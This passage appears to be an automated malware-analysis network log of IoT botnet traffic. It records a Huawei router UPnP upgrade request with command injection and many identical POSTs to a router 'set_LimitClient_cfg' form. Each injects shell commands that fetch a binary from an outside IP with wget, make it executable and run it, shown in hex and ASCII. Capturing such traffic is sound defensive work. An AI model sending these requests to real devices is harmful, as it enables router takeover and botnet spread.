63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
